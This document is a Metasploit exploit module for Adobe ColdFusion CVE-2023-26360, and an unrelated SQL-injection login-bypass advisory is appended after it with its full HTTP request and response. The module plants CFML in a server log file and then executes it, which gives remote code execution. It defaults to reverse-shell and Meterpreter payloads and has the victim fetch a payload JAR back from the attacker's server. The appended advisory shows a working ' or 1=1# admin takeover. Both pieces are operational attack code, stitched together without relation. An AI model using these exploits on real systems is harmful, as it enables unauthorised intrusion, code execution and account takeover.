##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2023-26360 (Adobe ColdFusion). The module plants CFML into a ColdFusion log
# file through a CFC request, then has the server compile and execute that log file as a template by
# supplying its relative path as the `_metadata.classname` of a second request. See #execute_cfml for
# the two requests involved and the response signature the module treats as success; the 'SideEffects'
# notes below list the on-disk and in-log artifacts this leaves behind.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStager

  # Module metadata and options.
  #
  # Options:
  # * RPORT        - defaults to 8500 (the ColdFusion built-in web server port used here).
  # * URIPATH      - path served by the module's own HTTP server (only used by the :java target).
  # * CFC_ENDPOINT - the .cfc endpoint both POST requests in #execute_cfml are sent to.
  # * CF_LOGFILE   - log file path relative to wwwroot; it receives the planted CFML and is then
  #                  referenced as a class name so that it is compiled and executed.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe ColdFusion Unauthenticated Remote Code Execution',
        'Description' => %q{
          This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe
          ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in
          order to gain remote code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sf', # MSF Exploit & Rapid7 Analysis
        ],
        'References' => [
          ['CVE', '2023-26360'],
          ['URL', 'https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis']
        ],
        'DisclosureDate' => '2023-03-14',
        'Platform' => %w[java win linux unix],
        'Arch' => [ARCH_JAVA, ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true, # Code execution as 'NT AUTHORITY\SYSTEM' on Windows and 'nobody' on Linux.
        'WfsDelay' => 30,
        # Each target's 'Type' selects the branch taken in #exploit; 'Platform' selects the shell used in
        # #execute_command and the path separator used for the class name in #execute_cfml.
        'Targets' => [
          [
            'Generic Java',
            {
              'Type' => :java,
              'Platform' => 'java',
              'Arch' => [ ARCH_JAVA ],
              'DefaultOptions' => {
                'PAYLOAD' => 'java/meterpreter/reverse_tcp'
              }
            },
          ],
          [
            'Windows Command',
            {
              'Type' => :cmd,
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            },
          ],
          [
            'Windows Dropper',
            {
              'Type' => :dropper,
              'Platform' => 'win',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'CmdStagerFlavor' => [ 'certutil', 'psh_invokewebrequest' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Unix Command',
            {
              'Type' => :cmd,
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_perl'
              }
            },
          ],
          [
            'Linux Dropper',
            {
              'Type' => :dropper,
              'Platform' => 'linux',
              'Arch' => [ARCH_X64],
              'CmdStagerFlavor' => [ 'curl', 'wget', 'bourne', 'printf' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            # The following artifacts will be left on disk:
            # The compiled CFML class generated from the poisoned coldfusion-out.log (Note: the hash number will vary)
            # * Windows: C:\ColdFusion2021\cfusion\wwwroot\WEB-INF\cfclasses\cfcoldfusion2dout2elog376354580.class
            # * Linux: /opt/ColdFusion2021/cfusion/wwwroot/WEB-INF/cfclasses/cfcoldfusion2dout2elog181815836.class
            # If a dropper payload was used, a file with a random name may be left.
            # * Windows: C:\Windows\Temp\XXXXXX.exe
            # * Linux: /tmp/XXXXXX
            ARTIFACTS_ON_DISK,
            # The following logs will contain IOCs:
            # C:\ColdFusion2021\cfusion\logs\coldfusion-out.log
            # C:\ColdFusion2021\cfusion\logs\exception.log
            # C:\ColdFusion2021\cfusion\logs\application.log
            IOC_IN_LOGS
          ],
          'RelatedModules' => [
            'auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360'
          ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8500),
        OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
        OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),
        OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])
      ]
    )
  end

  # Fingerprints ColdFusion from the cookie names returned by a GET to '/'. No version is recovered,
  # so the strongest result this method can return is CheckCode::Detected.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when there is no response or no matching cookie,
  #   Detected when a ColdFusion cookie name is seen.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/'
    )

    return CheckCode::Unknown('Connection failed') unless res

    # We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint
    # to match a ColdFusion cookie, and use this information to detect ColdFusion as being present.
    # https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69

    # NOTE(review): the '.' in '.cfusion' is unescaped, so this alternative matches any single character
    # followed by 'cfusion', not only a literal dot.
    if res.get_cookies =~ /(CFCLIENT_[^=]+|CFGLOBALS|CFID|CFTOKEN)=|.cfusion/
      return CheckCode::Detected('ColdFusion detected but version number is unknown.')
    end

    CheckCode::Unknown
  end

  # Entry point. Validates CFC_ENDPOINT, then dispatches on the selected target's 'Type':
  # * :java    - starts the module's HTTP server, plants CFML that loads a JAR from it, then waits on the handler.
  # * :cmd     - runs the encoded payload as a single command through #execute_command.
  # * :dropper - hands off to CmdStager, which is expected to call back into #execute_command for each stage.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when CFC_ENDPOINT does not end in '.cfc'.
  def exploit
    unless datastore['CFC_ENDPOINT'].end_with?('.cfc')
      fail_with(Failure::BadConfig, 'The CFC_ENDPOINT must point to a .cfc file')
    end

    case target['Type']
    when :java
      # Start the HTTP server
      start_service

      # Trigger a loadClass request via java.net.URLClassLoader
      trigger_urlclassloader

      # Handle the payload...
      handler
    when :cmd
      execute_command(payload.encoded)
    when :dropper
      execute_cmdstager
    end
  end

  # HttpServer callback. For the :java target the request from the victim's URLClassLoader is answered with
  # the encoded payload as a JAR ('application/java-archive'); for every other target type the request is
  # passed to the mixin's default handling.
  #
  # @param cli [Rex::Proto::Http::Client-side connection] the connection to respond on
  # @param _req the incoming request (unused; the response does not depend on its contents)
  def on_request_uri(cli, _req)
    if target['Type'] == :java
      print_status('Received payload request, transmitting payload jar...')

      send_response(cli, payload.encoded, {
        'Content-Type' => 'application/java-archive',
        'Connection' => 'close',
        'Pragma' => 'no-cache'
      })
    else
      super
    end
  end

  # Builds the CFML for the :java target and passes it to #execute_cfml. The CFML constructs a URL pointing at
  # the module's HTTP server (SRVHOST/SRVPORT), wraps it in a URL[1], creates a URLClassLoader over it, and
  # loads and runs 'metasploit.Payload'. All CFML variable names are random four-letter strings.
  def trigger_urlclassloader
    # Here we construct a CFML payload to load a Java payload via URLClassLoader.

    # NOTE: If our URL ends with / a XXX.class is loaded, if no trailing slash then a JAR is expected to be returned.

    cf_url = Rex::Text.rand_text_alpha_lower(4)

    srvhost = datastore['SRVHOST']

    # Ensure SRVHOST is a routable IP address to our RHOST.
    # addr_atoi returns 0 for a wildcard/unparseable address, in which case the local source address for rhost is used.
    if Rex::Socket.addr_atoi(srvhost) == 0
      srvhost = Rex::Socket.source_address(rhost)
    end

    # Create a URL pointing back to our HTTP server.
    cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"

    cf_reflectarray = Rex::Text.rand_text_alpha_lower(4)

    # Get a reference to java.lang.reflect.Array so we can create a URL[] instance.
    cfc_payload << "<cfset #{cf_reflectarray} = createObject('java','java.lang.reflect.Array')/>"

    cf_array = Rex::Text.rand_text_alpha_lower(4)

    # Create a URL[1] instance.
    cfc_payload << "<cfset #{cf_array} = #{cf_reflectarray}.newInstance(#{cf_url}.getClass(),1)/>"

    # Set the first element in the array to our URL.
    cfc_payload << "<cfset #{cf_reflectarray}.set(#{cf_array},0,#{cf_url})/>"

    cf_loader = Rex::Text.rand_text_alpha_lower(4)

    # Create a URLClassLoader instance.
    cfc_payload << "<cfset #{cf_loader} = createObject('java','java.net.URLClassLoader').init(#{cf_array},javaCast('null',''))/>"

    # Load the remote JAR file and instantiate an instance of metasploit.Payload.
    cfc_payload << "<cfset #{cf_loader}.loadClass('metasploit.Payload').newInstance().main(javaCast('null',''))/>"

    # No form parameter is needed here; the CFML is self-contained.
    execute_cfml(cfc_payload)
  end

  # Runs a single OS command for the :cmd and :dropper targets. The CFML planted in the log file does not
  # contain the command itself: it reads the command from the form field named by the random `cf_param` at
  # execution time, and that field is only sent with the second request made by #execute_cfml.
  #
  # @param cmd [String] the command to run; passed to the server as the value of `cf_param`.
  # @param _opts [Hash] accepted for CmdStager compatibility and otherwise ignored.
  def execute_command(cmd, _opts = {})
    cf_param = Rex::Text.rand_text_alpha_lower(4)

    # If the cf_param is present in the HTTP requests www-form encoded data then proceed with the child tags.
    cfc_payload = "<cfif IsDefined('form.#{cf_param}') is 'True'>"

    # Set our cf_param with the data in the requests form data, this is the command to run.
    cfc_payload << "<cfset #{cf_param}=form.#{cf_param}/>"

    # Here we construct a CFML payload to stage the :cmd and :dropper commands...
    shell_name = nil
    shell_arg = nil

    # Only the win/unix/linux targets reach this method (see 'Targets'); for any other platform both
    # values stay nil and would interpolate as empty strings below.
    case target['Platform']
    when 'win'
      shell_name = 'cmd.exe'
      shell_arg = '/C'
    when 'linux', 'unix'
      shell_name = '/bin/sh'
      shell_arg = '-c'
    end

    cf_array = Rex::Text.rand_text_alpha_lower(4)

    # Create an array of arguments to pass to exec()
    cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]/>"

    cf_runtime = Rex::Text.rand_text_alpha_lower(4)

    # Get a reference to the java.lang.Runtime class.
    cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'/>"

    # Call the static Runtime.exec method to execute our string array holding the command and the arguments.
    cfc_payload << "<cfset #{cf_runtime}.getRuntime().exec(#{cf_array})/>"

    # The end of the If tag.
    cfc_payload << '</cfif>'

    execute_cfml(cfc_payload, cf_param, cmd)
  end

  # Plants `cfml` in CF_LOGFILE and then has the server execute it. Two POST requests are made to
  # CFC_ENDPOINT, both with `method=<random>` and `_cfclient=true` in the query string:
  # 1. a `_variables` body holding the (unterminated) CFML, which ColdFusion writes to the log file; and
  # 2. a `_variables` body whose `_metadata.classname` is the relative path to that log file, which
  #    causes it to be compiled and run as a template. `param`/`param_data`, when given, are sent as an
  #    extra form field on this second request only.
  # The CFML's `cffinally` block overwrites the log file with an empty string, so the planted code is
  # removed from CF_LOGFILE on every execution (the compiled class listed under 'SideEffects' remains).
  # Both requests are expected to return HTTP 200 with '<title>Error</title>' in the body; anything else
  # is treated as failure.
  #
  # @param cfml [String] the CFML to wrap in cftry/cfcatch/cffinally and plant in the log file.
  # @param param [String, nil] name of a form field to include on the execution request.
  # @param param_data [String, nil] value for that form field; ignored unless `param` is also given.
  # @raise [Msf::Exploit::Failed] via fail_with when the wrapped CFML is 950 characters or longer, or when
  #   either request does not return the expected response.
  def execute_cfml(cfml, param = nil, param_data = nil)
    cfc_payload = '<cftry>'

    cfc_payload << cfml

    cfc_payload << "<cfcatch type='any'>"

    cfc_payload << '</cfcatch>'

    cfc_payload << '<cffinally>'

    # Clear the CF_LOGFILE which will contain this CFML code. We need to do this so we can repeatedly execute commands.
    # GetCurrentTemplatePath returns 'C:\ColdFusion2021\cfusion\wwwroot\..\logs\coldfusion-out.log' as this is the
    # template we are executing.
    cfc_payload << "<cffile action='write' file='#GetCurrentTemplatePath()#' output=''></cffile>"

    cfc_payload << '</cffinally>'

    cfc_payload << '</cftry>'

    # We can only log ~950 characters to a log file before the output is truncated, so we enforce a limit here.
    unless cfc_payload.length < 950
      fail_with(Failure::BadConfig, 'The CFC payload is too big to fit in the log file')
    end

    # We dont need to call a valid CFC method, so we just create a random method name to supply to the server.
    cfc_method = Rex::Text.rand_text_alpha_lower(1..8)

    # Perform the request that writes the cfc_payload to the CF_LOGFILE.
    # The leading '{' with no closing brace is what makes the server log the body verbatim.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(datastore['CFC_ENDPOINT']),
      'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },
      'vars_post' => { '_variables' => "{#{cfc_payload}" }
    )

    unless res && res.code == 200 && res.body.include?('<title>Error</title>')
      fail_with(Failure::UnexpectedReply, 'Failed to plant the payload in the ColdFusion output log file')
    end

    # The relative path from wwwroot to the CF_LOGFILE.
    cflog_file = datastore['CF_LOGFILE']

    # To construct the arbitrary file path from the attacker provided class name, we must insert 1 or 2 characters
    # to satisfy how coldfusion.runtime.JSONUtils.convertToTemplateProxy extracts the class name.
    # On Windows the forward slashes in CF_LOGFILE are replaced with backslashes; elsewhere a '/' separator is added.
    if target['Platform'] == 'win'
      classname = "#{Rex::Text.rand_text_alphanumeric(1)}#{cflog_file.gsub('/', '\\')}"
    else
      classname = "#{Rex::Text.rand_text_alphanumeric(1)}/#{cflog_file}"
    end

    # A `_metadata.classname` that resolves to a relative path outside the CFC directory (by default
    # '../logs/coldfusion-out.log') is the distinguishing feature of this second request.
    json_variables = "{\"_metadata\":{\"classname\":#{classname.to_json}},\"_variables\":[]}"

    vars_post = { '_variables' => json_variables }

    unless param.nil? || param_data.nil?
      vars_post[param] = param_data
    end

    # Perform the request that executes the CFML we wrote to the CF_LOGFILE, while passing the shell command to be
    # executed as a parameter which will in turn be read back out by the CFML in the cfc_payload.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(datastore['CFC_ENDPOINT']),
      'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },
      'vars_post' => vars_post
    )

    unless res && res.code == 200 && res.body.include?('<title>Error</title>')
      fail_with(Failure::UnexpectedReply, 'Failed to execute the payload in the ColdFusion output log file')
    end
  end

end
<pre><code>## Title: Old Age Home Management-2022-2023-1.0<br />SQLi-Bypass-Authentication-Account-Take-Over<br />## Author: nu11secur1ty<br />## Date: 04.29.2023<br />## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/<br />## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette<br />## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass<br /><br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection<br />attacks. The payloads nu11secur1ty' or 1=1# or<br />nu11secur1ty%27+or+1%3D1%23 were each submitted in the username<br />parameter. These two requests resulted in different responses,<br />indicating that the input is being incorporated into a SQL query in an<br />unsafe way. An attacker can easily take control of the admin<br />account, after which the application and all of its users are<br />compromised.<br /><br />STATUS: CRITICAL<br /><br />[+]Exploit:<br />```HTTP<br />POST /oahms/admin/login.php HTTP/1.1<br />Host: pwnedhost.com<br />Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg<br />Content-Length: 62<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://pwnedhost.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://pwnedhost.com/oahms/admin/login.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: 
close<br /><br />username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=<br />```<br />[+]Response:<br />```HTTP<br />HTTP/1.1 200 OK<br />Date: Sat, 29 Apr 2023 05:32:07 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0<br />Content-Security-Policy: upgrade-insecure-requests;<br />X-Powered-By: PHP/8.2.0<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 13518<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><br /><head><br /><br /> <title>Old Age Home Management System|| Dashboard</title><br /> <!-- base:css --><br /> <link rel="stylesheet" href="vendors/typicons/typicons.css"><br /> <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css"><br /> <link rel="stylesheet" href="css/vertical-layout-light/style.css"><br /> <!-- endinject --><br /><br /></head><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0)<br /><br />## Proof and Exploit<br />[href](https://streamable.com/qtj0bz)<br /><br />## Time spent:<br />00:30:00<br /><br /><br /></code></pre>